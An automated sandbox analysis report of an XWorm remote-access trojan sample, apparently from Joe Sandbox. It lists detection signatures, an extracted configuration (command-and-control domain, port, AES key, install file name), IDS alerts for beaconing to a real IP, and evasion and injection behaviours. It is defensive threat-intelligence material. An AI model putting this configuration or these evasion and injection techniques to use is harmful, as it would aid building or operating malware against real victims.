Windows Analysis Report
pKxhpP0spW.exe

Overview

General Information

Sample name:	pKxhpP0spW.exe renamed because original name is a hash value
Original sample name:	2047251822df06e77eba8c59f695d0b31c0b79199f37cf496f04d6955f5acc50.exe
Analysis ID:	1614136
MD5:	5b5fdbda39a6b76cb6f58bd3e7c94a0d
SHA1:	c95e0db60f54b3940ce26f88e6576b2cb27a7ab4
SHA256:	2047251822df06e77eba8c59f695d0b31c0b79199f37cf496f04d6955f5acc50
Tags:	exefavor-ydns-euuser-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Potentially malicious time measurement code found

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Signatures

AV Detection

Found malware configuration

Source: 00000026.00000002.2599427172.0000000002BC7000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Xworm {"C2 url": ["favor.ydns.eu"], "Port": 2627, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\boost_filesystem-mt-x64.dll

ReversingLabs: Detection: 37%

Multi AV Scanner detection for submitted file

Source: pKxhpP0spW.exe

Virustotal: Detection: 9%

Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Sample uses string decryption to hide its real strings

Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: favor.ydns.eu
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: 2627
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: <123456789>
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: <Xwormmm>
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: PLATA
Source: 00000015.00000002.2599478044.000002145142C000.00000004.00001000.00020000.00000000.sdmp	String decryptor: USB.exe

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD94601090 BCryptGenRandom,	4_2_00007FFD94601090
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946A16C0 BCryptSetProperty,	4_2_00007FFD946A16C0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4_2_00007FFD946A1850 BCryptSetProperty,	4_2_00007FFD946A1850
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD92791090 BCryptGenRandom,	21_2_00007FFD92791090
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1AAC20 BCryptGenRandom,_CxxThrowException,	21_2_00007FFD9B1AAC20
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A5A10 BCryptOpenAlgorithmProvider,BCryptGenRandom,?temp_directory_path@detail@filesystem@boost@@YA?AVpath@23@PEAVerror_code@system@3@@Z,?convert@path_traits@detail@filesystem@boost@@YAXPEBD0AEAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@PEBV?$codecvt@_WDU_Mbstatet@@@6@@Z,?append_v3@path@filesystem@boost@@AEAAXPEB_W0@Z,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,BCryptCloseAlgorithmProvider,	21_2_00007FFD9B1A5A10
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 21_2_00007FFD9B1A1EA0 BCryptOpenAlgorithmProvider,BCryptOpenAlgorithmProvider,__std_exception_copy,	21_2_00007FFD9B1A1EA0

Source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_28d48a0b-c

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\installutil.exe.log

Source: unknown

HTTPS traffic detected: 40.113.110.67:443 -> 192.168.2.6:49709 version: TLS 1.2

Source: pKxhpP0spW.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndPointer.pdb source: motor1.exe, 00000004.00000002.2548428390.00007FFDA5523000.00000002.00000001.01000000.00000016.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2605452248.00007FFDA4DA3000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndNetworking.pdb source: motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.1.dr
Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMcrypto\ex_data.c source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: motor1.exe, 00000004.00000002.2551275327.00007FFDAC0D5000.00000002.00000001.01000000.0000000E.sdmp, motor1.exe, 00000015.00000002.2605772212.00007FFDA54C5000.00000002.00000001.01000000.00000022.sdmp, vcruntime140_1.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb** source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndTime.pdb source: motor1.exe, 00000004.00000002.2546961814.00007FFDA4168000.00000002.00000001.01000000.00000013.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2604332137.00007FFDA3318000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2542097890.00007FFD93D7C000.00000002.00000001.01000000.00000014.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000002.2602655358.00007FFD9370C000.00000002.00000001.01000000.00000027.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndVersion.pdb source: motor1.exe, 00000004.00000002.2546408225.00007FFDA3A8B000.00000002.00000001.01000000.00000017.sdmp, motor1.exe, 00000015.00000002.2604104370.00007FFDA32FB000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb'' source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdb source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F517000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: crypto\stack\stack.ccompiler: cl /Zi /Fdossl_static.pdb /MD /Zl /Gs0 /GF /Gy -O2 -Ob2 -MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1k 25 Mar 2021built on: Wed Aug 4 14:11:39 2021 UTCplatform: VC-conan-Release-Windows-x86_64-Visual Studio-16OPENSSLDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\res"userSDIR: "D:\conan\openssl\1.1.1k\_\_\package\3fb49604f9c2f729b85ba3115852006824e72cab\lib\users-1_1"not availablecrypto\ex_data.c source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2542632185.00007FFD94148000.00000002.00000001.01000000.0000000A.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, motor1.exe, 00000015.00000002.2601968221.00007FFD92D38000.00000002.00000001.01000000.0000001F.sdmp, WebUid.dll.4.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndCrashHandler.pdbqq source: motor1.exe, 00000004.00000002.2549295572.00007FFDA55D7000.00000002.00000001.01000000.00000009.sdmp, motor1.exe, 00000015.00000002.2605254125.00007FFDA37A7000.00000002.00000001.01000000.0000001D.sdmp, FndCrashHandler.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndOS.pdb source: motor1.exe, 00000004.00000002.2545756356.00007FFDA384D000.00000002.00000001.01000000.00000010.sdmp, motor1.exe, 00000015.00000002.2604639455.00007FFDA336D000.00000002.00000001.01000000.00000024.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\installer.pdb source: motor1.exe, 00000004.00000000.2408388110.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000002.2541531038.00007FF7EDD07000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000002.2600550256.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp, motor1.exe, 00000015.00000000.2546559477.00007FF643557000.00000002.00000001.01000000.0000001A.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndHash.pdb!! source: motor1.exe, 00000004.00000002.2546678084.00007FFDA3AEE000.00000002.00000001.01000000.00000015.sdmp, motor1.exe, 00000015.00000002.2603749260.00007FFDA2E9E000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndException.pdb%% source: motor1.exe, 00000004.00000002.2548205143.00007FFDA4342000.00000002.00000001.01000000.00000011.sdmp, motor1.exe, 00000015.00000002.2604475973.00007FFDA3342000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndString.pdb source: motor1.exe, 00000004.00000002.2552861990.00007FFDAC107000.00000002.00000001.01000000.0000000B.sdmp, motor1.exe, 00000015.00000002.2606186290.00007FFDA5BB7000.00000002.00000001.01000000.0000001E.sdmp, FndString.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdb source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\WebUid.pdb source: motor1.exe, 00000004.00000002.2543383507.00007FFD944E2000.00000002.00000001.01000000.00000008.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000002.2603187948.00007FFD93A72000.00000002.00000001.01000000.0000001C.sdmp, WebUid.dll.4.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcomp140.amd64.pdbGCTL source: vcomp140.dll.1.dr
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndFilesystem.pdb source: motor1.exe, 00000004.00000002.2548964543.00007FFDA555F000.00000002.00000001.01000000.0000000F.sdmp, motor1.exe, 00000015.00000002.2603587965.00007FFD9B1BF000.00000002.00000001.01000000.00000028.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: C:\Users\runneradmin\AppData\Local\Temp\pkg.d7c6a10fb0263a69b4596321\node\out\Release\node.pdb) source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71C909000.00000002.00000001.01000000.00000003.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140_codecvt_ids.amd64.pdb source: motor1.exe, 00000004.00000002.2539797410.0000022D5F52B000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: motor1.exe, 00000004.00000002.2552193033.00007FFDAC0F1000.00000002.00000001.01000000.0000000D.sdmp, motor1.exe, 00000015.00000002.2604813167.00007FFDA3391000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: motor1.exe, 00000004.00000002.2546154593.00007FFDA38B5000.00000002.00000001.01000000.0000000C.sdmp, motor1.exe, 00000015.00000002.2605019875.00007FFDA33F5000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\J\WS\workspace\Web-installer-WinMac\build64\bin\FndAppLocations.pdb source: motor1.exe, 00000004.00000002.2550154810.00007FFDAC0C5000.00000002.00000001.01000000.00000012.sdmp, motor1.exe, 00000015.00000002.2605618348.00007FFDA5495000.00000002.00000001.01000000.00000023.sdmp

Found inlined nop instructions (likely shell or obfuscated code)

Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	4_2_00007FFD94601090
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rsi	4_2_00007FFD9462B550
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rdi	4_2_00007FFD946BB6E0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then xor eax, eax	4_2_00007FFD946017D0
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rsi	4_2_00007FFD946A9830
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rsi	4_2_00007FFD9461B090
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push rbx	4_2_00007FFD9461B180
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push r14	4_2_00007FFD9468F180
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then sub rsp, 28h	4_2_00007FFD9461B240
Source: C:\Users\user\AppData\Local\Temp\9b15adae3edafab926029a795506bc4f\motor1.exe	Code function: 4x nop then push r14	4_2_00007FFD9469B1E0
Source: C:\Users\user\SystemRootDoc\motor1.exe	Code function: 4x nop then mov rcx, qword ptr [rcx+08h]	21_2_00007FFD92791090

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50025 -> 178.215.224.234:2627
Source: Network traffic	Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:50028 -> 178.215.224.234:2627

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: favor.ydns.eu

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49883 -> 178.215.224.234:2627

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	TCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: motor1.exe	String found in binary or memory: disponibile all'indirizzo https://www.youtube.com/t/terms. L'Utente accetta di (i) rispettare tutte le leggi, le norme e i regolamenti applicabili e (ii) non accedere o utilizzare i Servizi API di YouTube in modo da violare tali leggi, norme e regolamenti o i equals www.youtube.com (Youtube)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: disponibile all'indirizzo https://www.youtube.com/t/terms. L'Utente accetta di (i) rispettare tutte le leggi, le norme e i regolamenti applicabili e (ii) non accedere o utilizzare i Servizi API di YouTube in modo da violare tali leggi, norme e regolamenti o in modo ingannevole, non etico, falso o fuorviante. equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://www.youtube.com/t/terms. equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates such laws, rules, and r equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: Versions of the Software intended for private use (personal license) as well as trial versions may not be used for commercial purposes, with only the following exception: use of any version of the Software to make videos for monetization on YouTube or similar services shall not constitute breach of this agreement as long as the description attached to such videos includes a statement to the effect that the video was created using the Software and includes a link to https://www.movavi.com/. equals www.youtube.com (Youtube)
Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: YOUTUBE API. Some Software, e.g., Movavi Video Editor and Movavi Slideshow Maker, uses the YouTube API under the terms of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates such laws, rules, and regulations, or in a manner that is deceptive, unethical, false, or misleading. equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: ce conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a manner that violates s equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: eshow Maker, uses the YouTube API under the terms of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: gral de ces conditions d'utilisation est disponible sur https://www.youtube.com/t/terms. Vous acceptez (i) de vous conformer equals www.youtube.com (Youtube)
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: ndigen Text dieser Nutzungsbedingungen finden Sie unter https://www.youtube.com/t/terms. Sie erkl equals www.youtube.com (Youtube)
Source: motor1.exe	String found in binary or memory: s of YouTube service conditions of use. The full text of these terms of use can be found at https://www.youtube.com/t/terms. You agree to (i) comply with all applicable laws, rules, and regulations, and (ii) not access or use the YouTube API Services in a mann equals www.youtube.com (Youtube)

Source: global traffic

DNS traffic detected: DNS query: favor.ydns.eu

Source: motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: HTTP://WWW.MPEGLA.COM.
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.css
Source: pKxhpP0spW.exe, 00000001.00000000.2369285246.00007FF71BF09000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://.jpg
Source: motor1.exe, 00000004.00000000.2408532196.00007FF7EDDDC000.00000002.00000001.01000000.00000005.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000015.00000000.2546784314.00007FF64362C000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: http://WWW.MPEGLA.COM/.
Source: motor1.exe, 00000004.00000002.2539797410.0000022D5F59E000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451600978.0000026DF6051000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451740824.0000022D5F535000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000002.2541254363.0000026DF6050000.00000004.00000020.00020000.00000000.sdmp, motor1.exe, 00000004.00000003.2451689953.0000022D5F59F000.00000004.00000020.00020000.00000000.sdmp, FndString.dll.4.dr, WebUid.dll.4.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
